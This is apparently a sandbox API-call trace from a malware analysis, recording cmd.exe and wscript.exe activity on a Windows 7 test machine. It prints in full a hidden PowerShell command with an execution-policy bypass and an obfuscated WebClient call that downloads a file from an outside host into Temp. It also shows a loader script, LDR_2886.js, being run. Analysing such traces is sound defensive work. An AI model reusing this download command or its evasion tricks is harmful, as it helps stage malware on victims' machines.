	[0071.478] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x46b6b0, Size=0x172) returned 0x46b6b0
	[0071.478] GetProcessHeap () returned 0x450000
	[0071.478] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x46b6b0) returned 0x172
	[0071.478] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0071.478] GetProcessHeap () returned 0x450000
	[0071.478] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xe8) returned 0x46b840
	[0071.478] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x46b840, Size=0x7e) returned 0x46b840
	[0071.478] GetProcessHeap () returned 0x450000
	[0071.478] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x46b840) returned 0x7e
	[0071.479] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0071.479] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x25ec00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ec00) returned 0xffffffffffffffff
	[0071.479] GetLastError () returned 0x2
	[0071.480] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x25ec00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ec00) returned 0xffffffffffffffff
	[0071.480] GetLastError () returned 0x2
	[0071.480] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x25ec00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ec00) returned 0xffffffffffffffff
	[0071.480] GetLastError () returned 0x2
	[0071.480] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0071.481] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x25ec00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ec00) returned 0xffffffffffffffff
	[0071.481] GetLastError () returned 0x2
	[0071.481] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x25ec00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ec00) returned 0xffffffffffffffff
	[0071.482] GetLastError () returned 0x2
	[0071.482] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x25ec00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ec00) returned 0xffffffffffffffff
	[0071.567] GetLastError () returned 0x2
	[0071.567] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0071.568] FindFirstFileExW (in: lpFileName="C:\\Windows\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x25ec00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ec00) returned 0xffffffffffffffff
	[0071.568] GetLastError () returned 0x2
	[0071.568] FindFirstFileExW (in: lpFileName="C:\\Windows\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x25ec00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ec00) returned 0xffffffffffffffff
	[0071.569] GetLastError () returned 0x2
	[0071.569] FindFirstFileExW (in: lpFileName="C:\\Windows\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x25ec00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ec00) returned 0xffffffffffffffff
	[0071.569] GetLastError () returned 0x2
	[0071.569] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0071.570] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x25ec00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ec00) returned 0xffffffffffffffff
	[0071.570] GetLastError () returned 0x2
	[0071.570] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x25ec00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ec00) returned 0xffffffffffffffff
	[0071.570] GetLastError () returned 0x2
	[0071.571] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x25ec00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ec00) returned 0xffffffffffffffff
	[0071.571] GetLastError () returned 0x2
	[0071.571] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0071.572] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x25ec00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x25ec00) returned 0x46a480
	[0071.572] GetProcessHeap () returned 0x450000
	[0071.572] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x4649a0
	[0071.572] FindClose (in: hFindFile=0x46a480 | out: hFindFile=0x46a480) returned 1
	[0071.572] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2
	[0071.572] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3
	[0071.572] GetConsoleTitleW (in: lpConsoleTitle=0x25f150, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0071.572] InitializeProcThreadAttributeList (in: lpAttributeList=0x25ef08, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x25eec8 | out: lpAttributeList=0x25ef08, lpSize=0x25eec8) returned 1
	[0071.572] UpdateProcThreadAttribute (in: lpAttributeList=0x25ef08, dwFlags=0x0, Attribute=0x60001, lpValue=0x25eeb8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x25ef08, lpPreviousValue=0x0) returned 1
	[0071.572] GetStartupInfoW (in: lpStartupInfo=0x25f020 | out: lpStartupInfo=0x25f020*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) 
	[0071.573] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1
	[0071.574] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Documents", lpStartupInfo=0x25ef40*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x25eef0 | out: lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessInformation=0x25eef0*(hProcess=0x54, hThread=0x50, dwProcessId=0xbc4, dwThreadId=0xba8)) returned 1
	[0071.577] CloseHandle (hObject=0x50) returned 1
	[0071.577] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0071.577] GetProcessHeap () returned 0x450000
	[0071.577] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46bb10 | out: hHeap=0x450000) returned 1
	[0071.577] GetEnvironmentStringsW () returned 0x46b8d0*
	[0071.577] GetProcessHeap () returned 0x450000
	[0071.577] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb2c) returned 0x46c820
	[0071.577] FreeEnvironmentStringsW (penv=0x46b8d0) returned 1
	[0071.577] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) 

Process:
	id = "17"
	image_name = "wscript.exe"
	filename = "c:\\windows\\system32\\wscript.exe"
	page_root = "0x413c4000"
	os_pid = "0xbb0"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x910"
	cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 146
	os_tid = 0xbbc

	[0071.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ffdc0 | out: lpSystemTimeAsFileTime=0x1ffdc0*(dwLowDateTime=0xa3483570, dwHighDateTime=0x1d543d1)) 
	[0071.879] GetCurrentProcessId () returned 0xbb0
	[0071.879] GetCurrentThreadId () returned 0xbbc
	[0071.879] GetTickCount () returned 0x22b44
	[0071.879] QueryPerformanceCounter (in: lpPerformanceCount=0x1ffdc8 | out: lpPerformanceCount=0x1ffdc8*=19630544208) returned 1
	[0071.880] GetStartupInfoA (in: lpStartupInfo=0x1ffde0 | out: lpStartupInfo=0x1ffde0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) 
	[0071.880] GetModuleHandleA (lpModuleName=0x0) returned 0xff540000
	[0071.880] GetModuleHandleA (lpModuleName=0x0) returned 0xff540000
	[0071.880] GetVersionExA (in: lpVersionInformation=0x1ffd00*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x381eb0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ffd00*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0071.880] GetUserDefaultLCID () returned 0x409
	[0071.881] CoInitialize (pvReserved=0x0) returned 0x0
	[0072.080] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	[0072.080] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" ") returned 85
	[0072.080] ??2@YAPEAX_K@Z () returned 0x2b57b0
	[0072.080] ??2@YAPEAX_K@Z () returned 0x2b5f60
	[0072.080] GetCurrentThreadId () returned 0xbbc
	[0072.080] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ffa48 | out: phkResult=0x1ffa48*=0x7c) returned 0x0
	[0072.080] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ffa40 | out: phkResult=0x1ffa40*=0x80) returned 0x0
	[0072.080] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x1fed48, lpData=0x1ff150, lpcbData=0x1fed40*=0x400 | out: lpType=0x1fed48*=0x0, lpData=0x1ff150*=0x67, lpcbData=0x1fed40*=0x400) returned 0x2
	[0072.080] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x1fed48, lpData=0x1ff150, lpcbData=0x1fed40*=0x400 | out: lpType=0x1fed48*=0x0, lpData=0x1ff150*=0x67, lpcbData=0x1fed40*=0x400) returned 0x2
	[0072.080] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x1fed48, lpData=0x1ff150, lpcbData=0x1fed40*=0x400 | out: lpType=0x1fed48*=0x0, lpData=0x1ff150*=0x67, lpcbData=0x1fed40*=0x400) returned 0x2
	[0072.081] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0072.423] RegCloseKey (hKey=0x80) returned 0x0
	[0072.423] RegCloseKey (hKey=0x7c) returned 0x0
	[0072.423] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ff760 | out: phkResult=0x1ff760*=0x7c) returned 0x0
	[0072.424] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ff758 | out: phkResult=0x1ff758*=0x80) returned 0x0
	[0072.424] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x1fea68, lpData=0x1fee70, lpcbData=0x1fea60*=0x400 | out: lpType=0x1fea68*=0x0, lpData=0x1fee70*=0x0, lpcbData=0x1fea60*=0x400) returned 0x2
	[0072.424] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x1fea68, lpData=0x1fee70, lpcbData=0x1fea60*=0x400 | out: lpType=0x1fea68*=0x0, lpData=0x1fee70*=0x0, lpcbData=0x1fea60*=0x400) returned 0x2
	[0072.424] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x1fea68, lpData=0x1fee70, lpcbData=0x1fea60*=0x400 | out: lpType=0x1fea68*=0x0, lpData=0x1fee70*=0x0, lpcbData=0x1fea60*=0x400) returned 0x2
	[0072.424] RegCloseKey (hKey=0x80) returned 0x0
	[0072.424] RegCloseKey (hKey=0x7c) returned 0x0
	[0072.424] GetACP () returned 0x4e4
	[0072.424] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77040000
	[0072.424] GetProcAddress (hModule=0x77040000, lpProcName="HeapSetInformation") returned 0x7705c4a0
	[0072.424] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0072.424] FreeLibrary (hLibModule=0x77040000) returned 1
	[0072.424] ??2@YAPEAX_K@Z () returned 0x2b5f80
	[0072.425] CoRegisterMessageFilter (in: lpMessageFilter=0x2b5f80, lplpMessageFilter=0x2b5f90 | out: lplpMessageFilter=0x2b5f90*=0x0) returned 0x0
	[0072.425] GetModuleFileNameW (in: hModule=0xff540000, lpFilename=0x1ffaa0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0072.425] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x1ff3f0 | out: lpdwHandle=0x1ff3f0) returned 0x704
	[0072.426] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x1fece0 | out: lpData=0x1fece0) returned 1
	[0072.426] VerQueryValueW (in: pBlock=0x1fece0, lpSubBlock="\\", lplpBuffer=0x1ff3f8, puLen=0x1ff3f4 | out: lplpBuffer=0x1ff3f8*=0x1fed08, puLen=0x1ff3f4) returned 1
	[0072.426] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ff448 | out: phkResult=0x1ff448*=0x7c) returned 0x0
	[0072.426] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x1fe798, lpData=0x1feba0, lpcbData=0x1fe790*=0x400 | out: lpType=0x1fe798*=0x0, lpData=0x1feba0*=0x0, lpcbData=0x1fe790*=0x400) returned 0x2
	[0072.426] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ff400 | out: phkResult=0x1ff400*=0x80) returned 0x0
	[0072.426] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x1ff3c4, lpData=0x1ff440, lpcbData=0x1ff3c0*=0x4 | out: lpType=0x1ff3c4*=0x0, lpData=0x1ff440*=0x70, lpcbData=0x1ff3c0*=0x4) returned 0x2
	[0072.426] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x1fe798, lpData=0x1feba0, lpcbData=0x1fe790*=0x400 | out: lpType=0x1fe798*=0x0, lpData=0x1feba0*=0x0, lpcbData=0x1fe790*=0x400) returned 0x2
	[0072.426] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x1ff3c4, lpData=0x1ff440, lpcbData=0x1ff3c0*=0x4 | out: lpType=0x1ff3c4*=0x0, lpData=0x1ff440*=0x70, lpcbData=0x1ff3c0*=0x4) returned 0x2
	[0072.426] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x1fe798, lpData=0x1feba0, lpcbData=0x1fe790*=0x400 | out: lpType=0x1fe798*=0x1, lpData="1", lpcbData=0x1fe790*=0x4) returned 0x0
	[0072.426] lstrlenW (lpString="1") returned 1
	[0072.426] lstrlenW (lpString="0") returned 1
	[0072.426] lstrlenW (lpString="1") returned 1
	[0072.426] lstrlenW (lpString="no") returned 2
	[0072.426] lstrlenW (lpString="1") returned 1
	[0072.426] lstrlenW (lpString="false") returned 5
	[0072.426] RegCloseKey (hKey=0x80) returned 0x0
	[0072.426] RegCloseKey (hKey=0x7c) returned 0x0
	[0072.426] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x1ff448, lpdwDisposition=0x0 | out: phkResult=0x1ff448*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0072.427] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x1ff3e4, lpData=0x1ff440, lpcbData=0x1ff3e0*=0x4 | out: lpType=0x1ff3e4*=0x0, lpData=0x1ff440*=0x70, lpcbData=0x1ff3e0*=0x4) returned 0x2
	[0072.427] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x1fe7b8, lpData=0x1febc0, lpcbData=0x1fe7b0*=0x400 | out: lpType=0x1fe7b8*=0x1, lpData="1", lpcbData=0x1fe7b0*=0x4) returned 0x0
	[0072.427] lstrlenW (lpString="1") returned 1
	[0072.427] lstrlenW (lpString="0") returned 1
	[0072.427] lstrlenW (lpString="1") returned 1
	[0072.427] lstrlenW (lpString="no") returned 2
	[0072.427] lstrlenW (lpString="1") returned 1
	[0072.427] lstrlenW (lpString="false") returned 5
	[0072.427] RegCloseKey (hKey=0x7c) returned 0x0
	[0072.427] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x1ff448, lpdwDisposition=0x0 | out: phkResult=0x1ff448*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0072.427] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x1ff3e4, lpData=0x1ff440, lpcbData=0x1ff3e0*=0x4 | out: lpType=0x1ff3e4*=0x0, lpData=0x1ff440*=0x70, lpcbData=0x1ff3e0*=0x4) returned 0x2
	[0072.427] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x1fe7b8, lpData=0x1febc0, lpcbData=0x1fe7b0*=0x400 | out: lpType=0x1fe7b8*=0x0, lpData=0x1febc0*=0x31, lpcbData=0x1fe7b0*=0x400) returned 0x2
	[0072.427] RegCloseKey (hKey=0x7c) returned 0x0
	[0072.427] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js") returned 48
	[0072.427] lstrlenW (lpString="js") returned 2
	[0072.427] lstrlenW (lpString="WSH") returned 3
	[0072.427] ??2@YAPEAX_K@Z () returned 0x2b5870
	[0072.427] LoadStringW (in: hInstance=0xff540000, uID=0x9c5, lpBuffer=0x1fdeb0, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
	[0072.428] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x1feef0*=0x0 | out: pptlib=0x1feef0*=0x3ad100) returned 0x0
	[0072.432] ITypeLib:GetTypeInfoOfGuid (in: This=0x3ad100, GUID=0xff5458f0, ppTInfo=0x1feed8 | out: ppTInfo=0x1feed8*=0x3ae4e8) returned 0x0
	[0072.435] ITypeInfo:GetRefTypeOfImplType (in: This=0x3ae4e8, index=0xffffffff, pRefType=0x1feed0 | out: pRefType=0x1feed0*=0xfffffffe) returned 0x0
	[0072.435] ITypeInfo:GetRefTypeInfo (in: This=0x3ae4e8, hreftype=0xfffffffe, ppTInfo=0xff55f458 | out: ppTInfo=0xff55f458*=0x3ae540) returned 0x0
	[0072.435] IUnknown:Release (This=0x3ae4e8) returned 0x1
	[0072.435] ??2@YAPEAX_K@Z () returned 0x2b5900
	[0072.435] ??2@YAPEAX_K@Z () returned 0x2b59a0
	[0072.435] ??2@YAPEAX_K@Z () returned 0x2b5a00
	[0072.435] ITypeLib:GetTypeInfoOfGuid (in: This=0x3ad100, GUID=0xff545950, ppTInfo=0x1feed8 | out: ppTInfo=0x1feed8*=0x3ae598) returned 0x0
	[0072.435] ITypeInfo:GetRefTypeOfImplType (in: This=0x3ae598, index=0xffffffff, pRefType=0x1feed0 | out: pRefType=0x1feed0*=0xfffffffe) returned 0x0
	[0072.435] ITypeInfo:GetRefTypeInfo (in: This=0x3ae598, hreftype=0xfffffffe, ppTInfo=0xff55f4d8 | out: ppTInfo=0xff55f4d8*=0x3ae5f0) returned 0x0
	[0072.435] IUnknown:Release (This=0x3ae598) returned 0x1
	[0072.435] ITypeLib:GetTypeInfoOfGuid (in: This=0x3ad100, GUID=0xff545960, ppTInfo=0x1feed8 | out: ppTInfo=0x1feed8*=0x3ae648) returned 0x0
	[0072.435] ITypeInfo:GetRefTypeOfImplType (in: This=0x3ae648, index=0xffffffff, pRefType=0x1feed0 | out: pRefType=0x1feed0*=0xfffffffe) returned 0x0
	[0072.435] ITypeInfo:GetRefTypeInfo (in: This=0x3ae648, hreftype=0xfffffffe, ppTInfo=0xff55f518 | out: ppTInfo=0xff55f518*=0x3ae6a0) returned 0x0
	[0072.435] IUnknown:Release (This=0x3ae648) returned 0x1
	[0072.435] ITypeLib:GetTypeInfoOfGuid (in: This=0x3ad100, GUID=0xff545910, ppTInfo=0x1feed8 | out: ppTInfo=0x1feed8*=0x3ae6f8) returned 0x0
	[0072.435] ITypeInfo:GetRefTypeOfImplType (in: This=0x3ae6f8, index=0xffffffff, pRefType=0x1feed0 | out: pRefType=0x1feed0*=0xfffffffe) returned 0x0
	[0072.435] ITypeInfo:GetRefTypeInfo (in: This=0x3ae6f8, hreftype=0xfffffffe, ppTInfo=0xff55f498 | out: ppTInfo=0xff55f498*=0x3ae750) returned 0x0
	[0072.435] IUnknown:Release (This=0x3ae6f8) returned 0x1
	[0072.436] IUnknown:Release (This=0x3ad100) returned 0x4
	[0072.436] ??2@YAPEAX_K@Z () returned 0x2b5a60
	[0072.436] GetCurrentThreadId () returned 0xbbc
	[0072.436] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc
	[0072.436] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xff551cf8, lpParameter=0x2b5a60, dwCreationFlags=0x0, lpThreadId=0x2b5a88 | out: lpThreadId=0x2b5a88*=0xb9c) returned 0xd4
	[0072.436] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x1ff130*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0072.662] CloseHandle (hObject=0xcc) returned 1
	[0072.662] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", nBufferLength=0x104, lpBuffer=0x1ff1c0, lpFilePart=0x1ff1b0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", lpFilePart=0x1ff1b0*="LDR_2886.js") returned 0x30
	[0072.662] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".js", ulOptions=0x0, samDesired=0x20019, phkResult=0x1fe6d0 | out: phkResult=0x1fe6d0*=0xe6) returned 0x0
	[0072.662] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x1fe680, lpData=0x1fe6e0, lpcbData=0x1fe684*=0x800 | out: lpType=0x1fe680*=0x1, lpData="JSFile", lpcbData=0x1fe684*=0xe) returned 0x0
	[0072.663] RegCloseKey (hKey=0xe6) returned 0x0
	[0072.663] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1fe6d0 | out: phkResult=0x1fe6d0*=0xe6) returned 0x0
	[0072.663] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x1fe680, lpData=0x1fef50, lpcbData=0x1fe684*=0x200 | out: lpType=0x1fe680*=0x1, lpData="JScript", lpcbData=0x1fe684*=0x10) returned 0x0
	[0072.663] RegCloseKey (hKey=0xe6) returned 0x0
	[0072.663] ??2@YAPEAX_K@Z () returned 0x2b63a0
	[0072.663] GetProcessHeap () returned 0x380000
	[0072.663] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x0, Size=0x2000) returned 0x3b8430
	[0072.663] CLSIDFromString (in: lpsz="JScript", pclsid=0x1feec8 | out: pclsid=0x1feec8*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0
